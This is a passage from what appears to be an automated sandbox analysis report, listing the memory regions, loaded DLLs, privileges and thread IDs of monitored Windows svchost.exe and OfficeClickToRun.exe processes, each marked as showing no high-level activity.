| ws2_32.dll | 0x7ffc57900000 | 0x7ffc57968fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ffc57970000 | 0x7ffc57a14fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ffc57aa0000 | 0x7ffc57b45fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
Process #58: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #58 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\system32\svchost.exe -k WbioSvcGroup |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:02:15, Reason: Self Terminated |
| Monitor Duration | 00:00:12 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x420 |
| Parent PID | 0x1e4 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeTcbPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege |
| Thread IDs |
0x
4F4
0x
464
0x
45C
0x
440
0x
424
0x
DF0
0x
FD0
0x
C40
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x0000009512120000 | 0x9512120000 | 0x951212ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| wbiosrvc.dll.mui | 0x9512130000 | 0x9512135fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000009512140000 | 0x9512140000 | 0x9512153fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000009512160000 | 0x9512160000 | 0x95121dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000095121e0000 | 0x95121e0000 | 0x95121e3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000095121f0000 | 0x95121f0000 | 0x95121f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000009512200000 | 0x9512200000 | 0x9512201fff | Private Memory | rw |
|
|
|
- |
| winbiostorageadapter.dll.mui | 0x9512210000 | 0x9512210fff | Memory Mapped File | r |
|
|
|
- |
| svchost.exe.mui | 0x9512220000 | 0x9512220fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000009512230000 | 0x9512230000 | 0x9512230fff | Private Memory | rw |
|
|
|
- |
| private_0x0000009512240000 | 0x9512240000 | 0x9512240fff | Private Memory | rw |
|
|
|
- |
| private_0x0000009512270000 | 0x9512270000 | 0x9512276fff | Private Memory | rw |
|
|
|
- |
| private_0x0000009512280000 | 0x9512280000 | 0x95122fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000009512300000 | 0x9512300000 | 0x95123fffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x9512400000 | 0x95124bdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000095124c0000 | 0x95124c0000 | 0x95125bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000095125c0000 | 0x95125c0000 | 0x95126bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000095126c0000 | 0x95126c0000 | 0x95127bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000095127c0000 | 0x95127c0000 | 0x9512947fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000009512970000 | 0x9512970000 | 0x9512976fff | Private Memory | rw |
|
|
|
- |
| private_0x0000009512a00000 | 0x9512a00000 | 0x9512afffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000009512b00000 | 0x9512b00000 | 0x9512c80fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000009512c90000 | 0x9512c90000 | 0x9512d4ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000009512d50000 | 0x9512d50000 | 0x9512e4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000009512e50000 | 0x9512e50000 | 0x9512f4ffff | Private Memory | rw |
|
|
|
- |
| oleaut32.dll | 0x9512f50000 | 0x951300cfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00007df5ff810000 | 0x7df5ff810000 | 0x7ff5ff80ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff6e0eee000 | 0x7ff6e0eee000 | 0x7ff6e0eeffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff6e0ef0000 | 0x7ff6e0ef0000 | 0x7ff6e0feffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff6e0ff0000 | 0x7ff6e0ff0000 | 0x7ff6e1012fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff6e1013000 | 0x7ff6e1013000 | 0x7ff6e1014fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e1015000 | 0x7ff6e1015000 | 0x7ff6e1016fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e1017000 | 0x7ff6e1017000 | 0x7ff6e1018fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e1019000 | 0x7ff6e1019000 | 0x7ff6e101afff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e101b000 | 0x7ff6e101b000 | 0x7ff6e101cfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e101d000 | 0x7ff6e101d000 | 0x7ff6e101efff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e101f000 | 0x7ff6e101f000 | 0x7ff6e101ffff | Private Memory | rw |
|
|
|
- |
| svchost.exe | 0x7ff6e1100000 | 0x7ff6e110cfff | Memory Mapped File | rwx |
|
|
|
- |
| rtworkq.dll | 0x7ffc4fc10000 | 0x7ffc4fc3ffff | Memory Mapped File | rwx |
|
|
|
- |
| mfplat.dll | 0x7ffc4fc40000 | 0x7ffc4fd4bfff | Memory Mapped File | rwx |
|
|
|
- |
| nuivoicewbsadapters.dll | 0x7ffc4fd50000 | 0x7ffc4fdbafff | Memory Mapped File | rwx |
|
|
|
- |
| winbiostorageadapter.dll | 0x7ffc4fdc0000 | 0x7ffc4fdcafff | Memory Mapped File | rwx |
|
|
|
- |
| facerecognitionengineadapter.dll | 0x7ffc4fdd0000 | 0x7ffc4fe05fff | Memory Mapped File | rwx |
|
|
|
- |
| d2d1.dll | 0x7ffc4fe10000 | 0x7ffc50354fff | Memory Mapped File | rwx |
|
|
|
- |
| facerecognitionsensoradapter.dll | 0x7ffc50360000 | 0x7ffc50390fff | Memory Mapped File | rwx |
|
|
|
- |
| winbioext.dll | 0x7ffc503a0000 | 0x7ffc503a7fff | Memory Mapped File | rwx |
|
|
|
- |
| ucrtbase.dll | 0x7ffc50400000 | 0x7ffc504f1fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcp_win.dll | 0x7ffc50500000 | 0x7ffc5059afff | Memory Mapped File | rwx |
|
|
|
- |
| wbiosrvc.dll | 0x7ffc505a0000 | 0x7ffc50639fff | Memory Mapped File | rwx |
|
|
|
- |
| avrt.dll | 0x7ffc50d80000 | 0x7ffc50d8afff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x7ffc52ef0000 | 0x7ffc52f16fff | Memory Mapped File | rwx |
|
|
|
- |
| dpapi.dll | 0x7ffc541f0000 | 0x7ffc541f9fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ffc54280000 | 0x7ffc5428afff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffc543a0000 | 0x7ffc543c7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffc543d0000 | 0x7ffc5443afff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x7ffc545f0000 | 0x7ffc54600fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffc54610000 | 0x7ffc5461efff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7ffc54620000 | 0x7ffc54663fff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x7ffc54db0000 | 0x7ffc54f70fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ffc54f80000 | 0x7ffc55032fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffc55040000 | 0x7ffc5521cfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffc552c0000 | 0x7ffc5535cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffc554e0000 | 0x7ffc5562dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffc55800000 | 0x7ffc558acfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffc56f10000 | 0x7ffc57094fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffc570a0000 | 0x7ffc571c5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffc571d0000 | 0x7ffc5744bfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffc57540000 | 0x7ffc5759afff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7ffc57750000 | 0x7ffc57890fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ffc57aa0000 | 0x7ffc57b45fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
Process #59: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #59 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x444 |
| Parent PID | 0x1e4 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\Local Service |
| Enabled Privileges | SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
6F0
0x
698
0x
694
0x
644
0x
638
0x
5FC
0x
58C
0x
588
0x
500
0x
4FC
0x
4EC
0x
4D4
0x
4CC
0x
4BC
0x
4AC
0x
4A8
0x
4A0
0x
49C
0x
494
0x
48C
0x
488
0x
484
0x
480
0x
474
0x
448
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00000016ac540000 | 0x16ac540000 | 0x16ac54ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| svchost.exe.mui | 0x16ac550000 | 0x16ac550fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000016ac560000 | 0x16ac560000 | 0x16ac573fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000016ac580000 | 0x16ac580000 | 0x16ac5fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000016ac600000 | 0x16ac600000 | 0x16ac603fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000016ac610000 | 0x16ac610000 | 0x16ac610fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000016ac620000 | 0x16ac620000 | 0x16ac621fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x16ac630000 | 0x16ac6edfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000016ac770000 | 0x16ac770000 | 0x16ac770fff | Private Memory | rw |
|
|
|
- |
| private_0x00000016ac780000 | 0x16ac780000 | 0x16ac780fff | Private Memory | rw |
|
|
|
- |
| bfe.dll.mui | 0x16ac790000 | 0x16ac796fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000016ac7a0000 | 0x16ac7a0000 | 0x16ac7affff | Private Memory | rw |
|
|
|
- |
| private_0x00000016ac7b0000 | 0x16ac7b0000 | 0x16ac7b0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000016ac7c0000 | 0x16ac7c0000 | 0x16ac7c6fff | Private Memory | rw |
|
|
|
- |
| firewallapi.dll.mui | 0x16ac7d0000 | 0x16ac7f3fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000016ac800000 | 0x16ac800000 | 0x16ac8fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000016ac900000 | 0x16ac900000 | 0x16aca87fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000016aca90000 | 0x16aca90000 | 0x16aca90fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000016acaa0000 | 0x16acaa0000 | 0x16acaa0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000016acab0000 | 0x16acab0000 | 0x16acab7fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000016acac0000 | 0x16acac0000 | 0x16acac1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000016acad0000 | 0x16acad0000 | 0x16acad0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000016acae0000 | 0x16acae0000 | 0x16acae6fff | Private Memory | rw |
|
|
|
- |
| private_0x00000016acb00000 | 0x16acb00000 | 0x16acbfffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000016acc00000 | 0x16acc00000 | 0x16acd80fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000016acd90000 | 0x16acd90000 | 0x16ace4ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000016ace50000 | 0x16ace50000 | 0x16acf4ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000016acf50000 | 0x16acf50000 | 0x16ad04ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000016ad060000 | 0x16ad060000 | 0x16ad066fff | Private Memory | rw |
|
|
|
- |
| firewallapi.dll | 0x16ad070000 | 0x16ad0ecfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000016ad100000 | 0x16ad100000 | 0x16ad1fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000016ad200000 | 0x16ad200000 | 0x16ad2fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000016ad300000 | 0x16ad300000 | 0x16ad3fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000016ad400000 | 0x16ad400000 | 0x16ad4fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000016ad500000 | 0x16ad500000 | 0x16ad5fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000016ad600000 | 0x16ad600000 | 0x16ad6fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000016ad800000 | 0x16ad800000 | 0x16ad8fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000016ad900000 | 0x16ad900000 | 0x16ad9fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000016ada00000 | 0x16ada00000 | 0x16ada7ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000016ada80000 | 0x16ada80000 | 0x16adb7ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000016adb80000 | 0x16adb80000 | 0x16adc7ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000016adc80000 | 0x16adc80000 | 0x16add7ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000016add80000 | 0x16add80000 | 0x16ae57ffff | Private Memory | - |
|
|
|
- |
| private_0x00000016ae580000 | 0x16ae580000 | 0x16ae67ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000016ae680000 | 0x16ae680000 | 0x16ae77ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000016ae780000 | 0x16ae780000 | 0x16ae87ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000016ae8d0000 | 0x16ae8d0000 | 0x16ae8d6fff | Private Memory | rw |
|
|
|
- |
| private_0x00000016ae900000 | 0x16ae900000 | 0x16ae9fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000016aea00000 | 0x16aea00000 | 0x16aeafffff | Private Memory | rw |
|
|
|
- |
| private_0x00000016aeb00000 | 0x16aeb00000 | 0x16aebfffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x16aec00000 | 0x16aef36fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000016aef40000 | 0x16aef40000 | 0x16af03ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000016af040000 | 0x16af040000 | 0x16af13ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000016af200000 | 0x16af200000 | 0x16af2fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000016af400000 | 0x16af400000 | 0x16af4fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000016af500000 | 0x16af500000 | 0x16af5fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000016af680000 | 0x16af680000 | 0x16af686fff | Private Memory | rw |
|
|
|
- |
| private_0x00000016af700000 | 0x16af700000 | 0x16af7fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000016af800000 | 0x16af800000 | 0x16af8fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000016af900000 | 0x16af900000 | 0x16af9fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000016afa00000 | 0x16afa00000 | 0x16afc00fff | Private Memory | rw |
|
|
|
- |
| private_0x00000016afc10000 | 0x16afc10000 | 0x16afd0ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000016d0d90000 | 0x16d0d90000 | 0x16d0e8ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000016d0e90000 | 0x16d0e90000 | 0x16d0f8ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000016d1000000 | 0x16d1000000 | 0x16d10fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000016d1100000 | 0x16d1100000 | 0x16d11fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000016d1200000 | 0x16d1200000 | 0x16d12fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000016d1300000 | 0x16d1300000 | 0x16d13fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000016d1400000 | 0x16d1400000 | 0x16d14fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000016d1500000 | 0x16d1500000 | 0x16d15fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000016d1800000 | 0x16d1800000 | 0x16d18fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000016d1900000 | 0x16d1900000 | 0x16d19fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000016d1a00000 | 0x16d1a00000 | 0x16d1afffff | Private Memory | rw |
|
|
|
- |
| private_0x00000016d1b00000 | 0x16d1b00000 | 0x16d1bfffff | Private Memory | rw |
|
|
|
- |
| private_0x00000016d1c00000 | 0x16d1c00000 | 0x16d1cfffff | Private Memory | rw |
|
|
|
- |
| private_0x00000016d1d00000 | 0x16d1d00000 | 0x16d1dfffff | Private Memory | rw |
|
|
|
- |
| private_0x00000016d1e00000 | 0x16d1e00000 | 0x16d1efffff | Private Memory | rw |
|
|
|
- |
| private_0x00000016d2100000 | 0x16d2100000 | 0x16d21fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ffd80000 | 0x7df5ffd80000 | 0x7ff5ffd7ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff6e0bf0000 | 0x7ff6e0bf0000 | 0x7ff6e0bf1fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0bf2000 | 0x7ff6e0bf2000 | 0x7ff6e0bf3fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0bf4000 | 0x7ff6e0bf4000 | 0x7ff6e0bf5fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0bf8000 | 0x7ff6e0bf8000 | 0x7ff6e0bf9fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0bfa000 | 0x7ff6e0bfa000 | 0x7ff6e0bfbfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0bfe000 | 0x7ff6e0bfe000 | 0x7ff6e0bfffff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0c00000 | 0x7ff6e0c00000 | 0x7ff6e0c01fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0c02000 | 0x7ff6e0c02000 | 0x7ff6e0c03fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0c04000 | 0x7ff6e0c04000 | 0x7ff6e0c05fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0c06000 | 0x7ff6e0c06000 | 0x7ff6e0c07fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0c08000 | 0x7ff6e0c08000 | 0x7ff6e0c09fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0c0a000 | 0x7ff6e0c0a000 | 0x7ff6e0c0bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0c0c000 | 0x7ff6e0c0c000 | 0x7ff6e0c0dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0c0e000 | 0x7ff6e0c0e000 | 0x7ff6e0c0ffff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0c10000 | 0x7ff6e0c10000 | 0x7ff6e0c11fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0c12000 | 0x7ff6e0c12000 | 0x7ff6e0c13fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0c14000 | 0x7ff6e0c14000 | 0x7ff6e0c15fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0c18000 | 0x7ff6e0c18000 | 0x7ff6e0c19fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0c1a000 | 0x7ff6e0c1a000 | 0x7ff6e0c1bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0c1c000 | 0x7ff6e0c1c000 | 0x7ff6e0c1dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0c1e000 | 0x7ff6e0c1e000 | 0x7ff6e0c1ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff6e0c20000 | 0x7ff6e0c20000 | 0x7ff6e0d1ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff6e0d20000 | 0x7ff6e0d20000 | 0x7ff6e0d42fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff6e0d44000 | 0x7ff6e0d44000 | 0x7ff6e0d45fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0d46000 | 0x7ff6e0d46000 | 0x7ff6e0d47fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0d48000 | 0x7ff6e0d48000 | 0x7ff6e0d49fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0d4a000 | 0x7ff6e0d4a000 | 0x7ff6e0d4afff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0d4e000 | 0x7ff6e0d4e000 | 0x7ff6e0d4ffff | Private Memory | rw |
|
|
|
- |
| svchost.exe | 0x7ff6e1100000 | 0x7ff6e110cfff | Memory Mapped File | rwx |
|
|
|
- |
| actxprxy.dll | 0x7ffc48ff0000 | 0x7ffc49459fff | Memory Mapped File | rwx |
|
|
|
- |
| srumapi.dll | 0x7ffc4a430000 | 0x7ffc4a442fff | Memory Mapped File | rwx |
|
|
|
- |
| energyprov.dll | 0x7ffc4a450000 | 0x7ffc4a462fff | Memory Mapped File | rwx |
|
|
|
- |
| ncuprov.dll | 0x7ffc4aed0000 | 0x7ffc4aedcfff | Memory Mapped File | rwx |
|
|
|
- |
| npmproxy.dll | 0x7ffc4b090000 | 0x7ffc4b09dfff | Memory Mapped File | rwx |
|
|
|
- |
| wpnsruprov.dll | 0x7ffc4b100000 | 0x7ffc4b10dfff | Memory Mapped File | rwx |
|
|
|
- |
| appsruprov.dll | 0x7ffc4b110000 | 0x7ffc4b126fff | Memory Mapped File | rwx |
|
|
|
- |
| eeprov.dll | 0x7ffc4b130000 | 0x7ffc4b14afff | Memory Mapped File | rwx |
|
|
|
- |
| nduprov.dll | 0x7ffc4b150000 | 0x7ffc4b164fff | Memory Mapped File | rwx |
|
|
|
- |
| wlanapi.dll | 0x7ffc4b170000 | 0x7ffc4b1cefff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x7ffc4b890000 | 0x7ffc4b899fff | Memory Mapped File | rwx |
|
|
|
- |
| radardt.dll | 0x7ffc4b8a0000 | 0x7ffc4b8bcfff | Memory Mapped File | rwx |
|
|
|
- |
| esent.dll | 0x7ffc4bc70000 | 0x7ffc4bf51fff | Memory Mapped File | rwx |
|
|
|
- |
| srumsvc.dll | 0x7ffc4bf60000 | 0x7ffc4bf97fff | Memory Mapped File | rwx |
|
|
|
- |
| pnpts.dll | 0x7ffc4c210000 | 0x7ffc4c218fff | Memory Mapped File | rwx |
|
|
|
- |
| netprofm.dll | 0x7ffc4c220000 | 0x7ffc4c25efff | Memory Mapped File | rwx |
|
|
|
- |
| wfapigp.dll | 0x7ffc4c260000 | 0x7ffc4c26bfff | Memory Mapped File | rwx |
|
|
|
- |
| diagperf.dll | 0x7ffc4c470000 | 0x7ffc4c5d5fff | Memory Mapped File | rwx |
|
|
|
- |
| wdi.dll | 0x7ffc4dab0000 | 0x7ffc4daccfff | Memory Mapped File | rwx |
|
|
|
- |
| dps.dll | 0x7ffc4dbe0000 | 0x7ffc4dc0efff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x7ffc4ddd0000 | 0x7ffc4e145fff | Memory Mapped File | rwx |
|
|
|
- |
| mrmcorer.dll | 0x7ffc4f1f0000 | 0x7ffc4f2fefff | Memory Mapped File | rwx |
|
|
|
- |
| wship6.dll | 0x7ffc4f8b0000 | 0x7ffc4f8b7fff | Memory Mapped File | rwx |
|
|
|
- |
| wshtcpip.dll | 0x7ffc4f8c0000 | 0x7ffc4f8c7fff | Memory Mapped File | rwx |
|
|
|
- |
| wshqos.dll | 0x7ffc4f8d0000 | 0x7ffc4f8d9fff | Memory Mapped File | rwx |
|
|
|
- |
| adhapi.dll | 0x7ffc4f8e0000 | 0x7ffc4f8e9fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcp110_win.dll | 0x7ffc4f8f0000 | 0x7ffc4f981fff | Memory Mapped File | rwx |
|
|
|
- |
| policymanager.dll | 0x7ffc4f990000 | 0x7ffc4f9c8fff | Memory Mapped File | rwx |
|
|
|
- |
| httpprxc.dll | 0x7ffc4f9d0000 | 0x7ffc4f9d8fff | Memory Mapped File | rwx |
|
|
|
- |
| fwpolicyiomgr.dll | 0x7ffc4f9e0000 | 0x7ffc4fa14fff | Memory Mapped File | rwx |
|
|
|
- |
| mpssvc.dll | 0x7ffc4fa20000 | 0x7ffc4faf9fff | Memory Mapped File | rwx |
|
|
|
- |
| xmllite.dll | 0x7ffc4fb00000 | 0x7ffc4fb35fff | Memory Mapped File | rwx |
|
|
|
- |
| bfe.dll | 0x7ffc4fb40000 | 0x7ffc4fc09fff | Memory Mapped File | rwx |
|
|
|
- |
| ucrtbase.dll | 0x7ffc50400000 | 0x7ffc504f1fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcp_win.dll | 0x7ffc50500000 | 0x7ffc5059afff | Memory Mapped File | rwx |
|
|
|
- |
| fwpuclnt.dll | 0x7ffc50980000 | 0x7ffc509e7fff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc.dll | 0x7ffc50a50000 | 0x7ffc50a69fff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc6.dll | 0x7ffc50a70000 | 0x7ffc50a85fff | Memory Mapped File | rwx |
|
|
|
- |
| wkscli.dll | 0x7ffc514b0000 | 0x7ffc514c5fff | Memory Mapped File | rwx |
|
|
|
- |
| taskschd.dll | 0x7ffc51760000 | 0x7ffc5181ffff | Memory Mapped File | rwx |
|
|
|
- |
| wevtapi.dll | 0x7ffc519c0000 | 0x7ffc51a24fff | Memory Mapped File | rwx |
|
|
|
- |
|
For performance reasons, the remaining 38 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Process #60: officeclicktorun.exe
0
0
| Information | Value |
|---|---|
| ID | #60 |
| File Name | c:\program files\common files\microsoft shared\clicktorun\officeclicktorun.exe |
| Command Line | "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x4c4 |
| Parent PID | 0x1e4 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
A54
0x
A64
0x
78C
0x
768
0x
724
0x
720
